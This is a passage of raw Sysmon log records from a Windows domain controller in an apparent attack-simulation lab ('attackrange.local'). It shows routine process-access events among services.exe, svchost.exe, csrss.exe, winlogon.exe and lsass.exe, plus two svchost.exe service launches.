12:00:44.674{266CAFBE-646A-6064-0A00-00000000AE01}8401184C:\Windows\system32\services.exe{266CAFBE-646C-6064-1300-00000000AE01}1228C:\Windows\System32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7354|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6f453|C:\Windows\System32\KERNEL32.DLL+1d37f|C:\Windows\system32\services.exe+307d|C:\Windows\system32\services.exe+6334|C:\Windows\system32\services.exe+dc24|C:\Windows\system32\services.exe+d248|C:\Windows\system32\services.exe+4d0c|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4
|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001133Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:00:44.674{266CAFBE-646A-6064-0B00-00000000AE01}856888C:\Windows\system32\lsass.exe{266CAFBE-646A-6064-0900-00000000AE01}788C:\Windows\system32\winlogon.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\lsasrv.dll+10d9e|C:\Windows\system32\lsasrv.dll+1d1e8|C:\Windows\system32\lsasrv.dll+1c411|C:\Windows\system32\lsasrv.dll+1b160|C:\Windows\system32\lsasrv.dll+2706b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001132Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:00:44.674{266CAFBE-646A-6064-0B00-00000000AE01}856888C:\Windows\system32\lsass.exe{266CAFBE-646A-6064-0900-00000000AE01}788C:\Windows\system32\winlogon.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\lsasrv.dll+10d9e|C:\Windows\system32\lsasrv.dll+1d1e8|C:\Windows\system32\lsasrv.dll+1c411|C:\Windows\system32\lsasrv.dll+1ac30|C:\Windows\system32\lsasrv.dll+2706b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001131Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:00:44.674{266CAFBE-646A-6064-0B00-00000000AE01}856888C:\Windows\system32\lsass.exe{266CAFBE-646A-6064-0900-00000000AE01}788C:\Windows\system32\winlogon.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\lsasrv.dll+10d9e|C:\Windows\system32\lsasrv.dll+19616|C:\Windows\system32\lsasrv.dll+1abbf|C:\Windows\system32\lsasrv.dll+2706b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001130Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:00:44.674{266CAFBE-646A-6064-0B00-00000000AE01}8561016C:\Windows\system32\lsass.exe{266CAFBE-646A-6064-0A00-00000000AE01}840C:\Windows\system32\services.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\lsasrv.dll+10d9e|C:\Windows\system32\lsasrv.dll+1d1e8|C:\Windows\system32\lsasrv.dll+1c411|C:\Windows\system32\lsasrv.dll+1ac30|C:\Windows\system32\lsasrv.dll+2706b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001129Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:00:44.674{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-646A-6064-0B00-00000000AE01}856C:\Windows\system32\lsass.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+f86b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 
10341000x80000000000000001128Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:00:44.674{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-646A-6064-0B00-00000000AE01}856C:\Windows\system32\lsass.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+f71b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001127Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:00:44.674{266CAFBE-646A-6064-0B00-00000000AE01}8561016C:\Windows\system32\lsass.exe{266CAFBE-646A-6064-0A00-00000000AE01}840C:\Windows\system32\services.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\lsasrv.dll+1a18d|C:\Windows\system32\lsasrv.dll+2706b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 
10341000x80000000000000001126Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:00:44.659{266CAFBE-6469-6064-0500-00000000AE01}624640C:\Windows\system32\csrss.exe{266CAFBE-646C-6064-1200-00000000AE01}1196C:\Windows\system32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5182f 10341000x80000000000000001125Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:00:44.659{266CAFBE-6469-6064-0500-00000000AE01}6241132C:\Windows\system32\csrss.exe{266CAFBE-646C-6064-1100-00000000AE01}1200C:\Windows\System32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5182f 10341000x80000000000000001124Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:00:44.659{266CAFBE-646A-6064-0A00-00000000AE01}8401108C:\Windows\system32\services.exe{266CAFBE-646C-6064-1200-00000000AE01}1196C:\Windows\system32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7354|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6f453|C:\Windows\System32\KERNEL32.DLL+1d37f|C:\Windows\system32\services.exe+307d|C:\Windows\system32\services.exe+6334|C:\Windows\system32\services.exe+ddc1|C:\Windows\system32\services.exe+d3ee|C:\Windows\system32\services.exe+4d0c|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dl
l+51821 10341000x80000000000000001123Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:00:44.659{266CAFBE-646A-6064-0A00-00000000AE01}8401100C:\Windows\system32\services.exe{266CAFBE-646C-6064-1100-00000000AE01}1200C:\Windows\System32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7354|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6f453|C:\Windows\System32\KERNEL32.DLL+1d37f|C:\Windows\system32\services.exe+307d|C:\Windows\system32\services.exe+6334|C:\Windows\system32\services.exe+dc24|C:\Windows\system32\services.exe+d3ee|C:\Windows\system32\services.exe+4d0c|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 154100x80000000000000001122Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:00:44.669{266CAFBE-646C-6064-1200-00000000AE01}1196C:\Windows\System32\svchost.exe10.0.14393.0 (rs1_release.160715-1616)Host Process for Windows ServicesMicrosoft® Windows® Operating SystemMicrosoft Corporationsvchost.exeC:\Windows\system32\svchost.exe -k LocalServiceC:\Windows\system32\NT AUTHORITY\LOCAL SERVICE{266CAFBE-646C-6064-E503-000000000000}0x3e50SystemMD5=36F670D89040709013F6A460176767EC,SHA256=438B6CCD84F4DD32D9684ED7D58FD7D1E5A75FE3F3D12AB6C788E6BB0FFAD5E7,IMPHASH=2CED93915677390B76EE1916B92F3EF6{266CAFBE-646A-6064-0A00-00000000AE01}840C:\Windows\System32\services.exeC:\Windows\system32\services.exe 
10341000x80000000000000001121Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:00:44.659{266CAFBE-646A-6064-0A00-00000000AE01}8401136C:\Windows\system32\services.exe{266CAFBE-646C-6064-0F00-00000000AE01}1116C:\Windows\System32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\system32\services.exe+1713f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001120Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:00:44.659{266CAFBE-646A-6064-0A00-00000000AE01}8401136C:\Windows\system32\services.exe{266CAFBE-646C-6064-1000-00000000AE01}1124C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\system32\services.exe+1713f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001119Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:00:44.659{266CAFBE-646C-6064-0C00-00000000AE01}5921104C:\Windows\system32\svchost.exe{266CAFBE-646C-6064-0F00-00000000AE01}1116C:\Windows\System32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001118Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:00:44.659{266CAFBE-646C-6064-0C00-00000000AE01}5921104C:\Windows\system32\svchost.exe{266CAFBE-646C-6064-1000-00000000AE01}1124C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001117Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:00:44.643{266CAFBE-646C-6064-0C00-00000000AE01}5921104C:\Windows\system32\svchost.exe{266CAFBE-646A-6064-0900-00000000AE01}788C:\Windows\system32\winlogon.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001116Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:00:44.643{266CAFBE-646C-6064-0C00-00000000AE01}5921104C:\Windows\system32\svchost.exe{266CAFBE-646A-6064-0900-00000000AE01}788C:\Windows\system32\winlogon.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001115Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:00:44.643{266CAFBE-6469-6064-0500-00000000AE01}624640C:\Windows\system32\csrss.exe{266CAFBE-646C-6064-1000-00000000AE01}1124C:\Windows\system32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5182f 10341000x80000000000000001114Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:00:44.643{266CAFBE-646A-6064-0A00-00000000AE01}840920C:\Windows\system32\services.exe{266CAFBE-646C-6064-1000-00000000AE01}1124C:\Windows\system32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7354|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6f453|C:\Windows\System32\KERNEL32.DLL+1d37f|C:\Windows\system32\services.exe+307d|C:\Windows\system32\services.exe+6334|C:\Windows\system32\services.exe+dc24|C:\Windows\system32\services.exe+d248|C:\Windows\system32\services.exe+4d0c|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001113Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:00:44.643{266CAFBE-6469-6064-0500-00000000AE01}624740C:\Windows\system32\csrss.exe{266CAFBE-646C-6064-0F00-00000000AE01}1116C:\Windows\System32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5182f 
10341000x80000000000000001112Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:00:44.643{266CAFBE-646A-6064-0A00-00000000AE01}840932C:\Windows\system32\services.exe{266CAFBE-646C-6064-0F00-00000000AE01}1116C:\Windows\System32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7354|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6f453|C:\Windows\System32\KERNEL32.DLL+1d37f|C:\Windows\system32\services.exe+307d|C:\Windows\system32\services.exe+6334|C:\Windows\system32\services.exe+dc24|C:\Windows\system32\services.exe+d248|C:\Windows\system32\services.exe+4d0c|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 154100x80000000000000001111Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:00:44.649{266CAFBE-646C-6064-0F00-00000000AE01}1116C:\Windows\System32\svchost.exe10.0.14393.0 (rs1_release.160715-1616)Host Process for Windows ServicesMicrosoft® Windows® Operating SystemMicrosoft Corporationsvchost.exeC:\Windows\System32\svchost.exe -k termsvcsC:\Windows\system32\NT AUTHORITY\NETWORK SERVICE{266CAFBE-646C-6064-E403-000000000000}0x3e40SystemMD5=36F670D89040709013F6A460176767EC,SHA256=438B6CCD84F4DD32D9684ED7D58FD7D1E5A75FE3F3D12AB6C788E6BB0FFAD5E7,IMPHASH=2CED93915677390B76EE1916B92F3EF6{266CAFBE-646A-6064-0A00-00000000AE01}840C:\Windows\System32\services.exeC:\Windows\system32\services.exe 
10341000x80000000000000001110Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:00:44.643{266CAFBE-646C-6064-0C00-00000000AE01}5921104C:\Windows\system32\svchost.exe{266CAFBE-646A-6064-0B00-00000000AE01}856C:\Windows\system32\lsass.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+f86b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001109Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:00:44.643{266CAFBE-646C-6064-0C00-00000000AE01}5921104C:\Windows\system32\svchost.exe{266CAFBE-646A-6064-0B00-00000000AE01}856C:\Windows\system32\lsass.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+f71b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001108Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
